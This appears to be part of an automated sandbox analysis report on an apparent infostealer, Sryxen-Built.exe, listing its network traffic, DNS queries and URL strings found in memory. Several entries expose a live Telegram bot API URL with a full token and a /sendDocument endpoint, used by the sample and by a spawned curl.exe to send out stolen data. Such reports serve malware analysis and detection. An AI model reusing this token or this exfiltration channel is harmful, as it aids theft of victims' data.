Source: global trafficHTTP traffic detected: GET /crx/blobs/Ad_brx23lef_cW590ESOTTAroOhZ9si0XFJIUC52j2ILHW1VLB5ou6c0RgLWwGr1aRJJZ0WPNyiPBYgIpWfykvhKW-6BLzMRsp9ykw5f6ReBQmPpO6WB9pcSJPfykLTHDjYAxlKa5bf72z8tHS5eXuTavTP1h4WZBjSs/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_89_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.4fa8815283fe3d88a934.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.a1e626d952b002612af0.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.c64f021441815c638c7a.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=0815C547F66A6ADB3C0FD0EEF7EC6BB9; _EDGE_S=F=1&SID=053C93CE852E60321C77866784FF61EE; _EDGE_V=1
Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1741477429202&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a8317c49e1884f1e947b8f0bc3e99881&activityId=a8317c49e1884f1e947b8f0bc3e99881&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=0815C547F66A6ADB3C0FD0EEF7EC6BB9; _EDGE_S=F=1&SID=053C93CE852E60321C77866784FF61EE; _EDGE_V=1
Source: global trafficHTTP traffic detected: GET /b?rn=1741477429202&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0815C547F66A6ADB3C0FD0EEF7EC6BB9&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /b2?rn=1741477429202&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0815C547F66A6ADB3C0FD0EEF7EC6BB9&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1FE9d7078d51dda838700e01741477429; XID=1FE9d7078d51dda838700e01741477429
Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.45sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 400sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 3gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=A8317C49E1884F1E947B8F0BC3E99881.RefC=2025-03-08T23:43:37Z; USRLOC=; MUID=0815C547F66A6ADB3C0FD0EEF7EC6BB9; MUIDB=0815C547F66A6ADB3C0FD0EEF7EC6BB9; _EDGE_S=F=1&SID=053C93CE852E60321C77866784FF61EE; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=4e91a935-a781-423c-ae0b-d31fa8e59a63; ai_session=FZ3aDEuxLqd+F7puLTADxu|1741477429198|1741477429198; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=A8317C49E1884F1E947B8F0BC3E99881.RefC=2025-03-08T23:43:37Z
Source: global trafficHTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":22,"imageId":"BB1msDBP","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=A8317C49E1884F1E947B8F0BC3E99881.RefC=2025-03-08T23:43:37Z; USRLOC=; MUID=0815C547F66A6ADB3C0FD0EEF7EC6BB9; MUIDB=0815C547F66A6ADB3C0FD0EEF7EC6BB9; _EDGE_S=F=1&SID=053C93CE852E60321C77866784FF61EE; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=4e91a935-a781-423c-ae0b-d31fa8e59a63; ai_session=FZ3aDEuxLqd+F7puLTADxu|1741477429198|1741477429198; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=A8317C49E1884F1E947B8F0BC3E99881.RefC=2025-03-08T23:43:37Z
Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1741477429202&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=a8317c49e1884f1e947b8f0bc3e99881&activityId=a8317c49e1884f1e947b8f0bc3e99881&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=3D7D56B0A2034413818A5FEF887FCACF&MUID=0815C547F66A6ADB3C0FD0EEF7EC6BB9 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0815C547F66A6ADB3C0FD0EEF7EC6BB9; _EDGE_S=F=1&SID=053C93CE852E60321C77866784FF61EE; _EDGE_V=1; SM=T; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
Source: Sryxen-Built.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: Sryxen-Built.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: Sryxen-Built.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: Sryxen-Built.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: Sryxen-Built.exeString found in binary or memory: http://ocsp.sectigo.com0
Source: Amcache.hve.25.drString found in binary or memory: http://upx.sf.net
Source: NTtqcw9.db.0.drString found in binary or memory: https://ac.ecosia.org?q=
Source: curl.exe, 00000013.00000002.1391486810.00000235E6890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument
Source: curl.exe, 00000013.00000002.1391486810.00000235E6898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument#
Source: Sryxen-Built.exe, 00000000.00000002.1489919638.0000018D463B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocument7eate
Source: curl.exe, 00000013.00000002.1391486810.00000235E6890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentC:
Source: curl.exe, 00000013.00000002.1391486810.00000235E6898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentF
Source: curl.exe, 00000013.00000002.1391486810.00000235E6890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentJ
Source: curl.exe, 00000013.00000002.1391486810.00000235E6898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentX
Source: curl.exe, 00000013.00000002.1391486810.00000235E68AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7774722139:AAGKGwfFrq-o_byjA5OXes5903E7cCoWZ7Y/sendDocumentzm#
Source: 2cc80dabc69f58b6_1.11.drString found in binary or memory: https://assets.msn.cn/resolver/
Source: 2cc80dabc69f58b6_1.11.drString found in binary or memory: https://assets.msn.com/resolver/
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://bard.google.com/
Source: 2cc80dabc69f58b6_1.11.drString found in binary or memory: https://bit.ly/wb-precache
Source: 2cc80dabc69f58b6_1.11.drString found in binary or memory: https://browser.events.data.msn.cn/
Source: 2cc80dabc69f58b6_1.11.drString found in binary or memory: https://browser.events.data.msn.com/
Source: Reporting and NEL0.11.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
Source: 2cc80dabc69f58b6_1.11.drString found in binary or memory: https://c.msn.com/
Source: NTtqcw9.db.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: service_worker_bin_prod.js.11.dr, offscreendocument_main.js.11.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
Source: Sryxen-Built.exe, 00000000.00000003.1259585485.0000018D463B3000.00000004.00000020.00020000.00000000.sdmp, Web Data.11.dr, NTtqcw9.db.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Sryxen-Built.exe, 00000000.00000003.1259585485.0000018D463B3000.00000004.00000020.00020000.00000000.sdmp, Web Data.11.dr, NTtqcw9.db.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Network Persistent State0.11.drString found in binary or memory: https://chrome.cloudflare-dns.com
Source: manifest.json.11.drString found in binary or memory: https://chrome.google.com/webstore/
Source: manifest.json.11.drString found in binary or memory: https://chromewebstore.google.com/
Source: cb613135-e235-4699-815e-4fae7ebe34a0.tmp.12.drString found in binary or memory: https://clients2.google.com
Source: manifest.json0.11.drString found in binary or memory: https://clients2.google.com/service/update2/crx
Source: cb613135-e235-4699-815e-4fae7ebe34a0.tmp.12.drString found in binary or memory: https://clients2.googleusercontent.com
Source: 2cc80dabc69f58b6_0.11.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: manifest.json0.11.drString found in binary or memory: https://docs.google.com/
Source: manifest.json0.11.drString found in binary or memory: https://drive-autopush.corp.google.com/
Source: manifest.json0.11.drString found in binary or memory: https://drive-daily-0.corp.google.com/
Source: manifest.json0.11.drString found in binary or memory: https://drive-daily-1.corp.google.com/
Source: manifest.json0.11.drString found in binary or memory: https://drive-daily-2.corp.google.com/
Source: manifest.json0.11.drString found in binary or memory: https://drive-daily-3.corp.google.com/
Source: manifest.json0.11.drString found in binary or memory: https://drive-daily-4.corp.google.com/
Source: manifest.json0.11.drString found in binary or memory: https://drive-daily-5.corp.google.com/
Source: manifest.json0.11.drString found in binary or memory: https://drive-daily-6.corp.google.com/
Source: manifest.json0.11.drString found in binary or memory: https://drive-preprod.corp.google.com/
Source: manifest.json0.11.drString found in binary or memory: https://drive-staging.corp.google.com/
Source: manifest.json0.11.drString found in binary or memory: https://drive.google.com/
Source: NTtqcw9.db.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Web Data.11.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Sryxen-Built.exe, 00000000.00000003.1259585485.0000018D463B3000.00000004.00000020.00020000.00000000.sdmp, NTtqcw9.db.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: NTtqcw9.db.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 000003.log9.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
Source: 000003.log10.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
Source: HubApps Icons.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.dr, HubApps Icons.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
Source: 3c450eca-aa0f-49c2-9ca2-20c9379b42b4.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
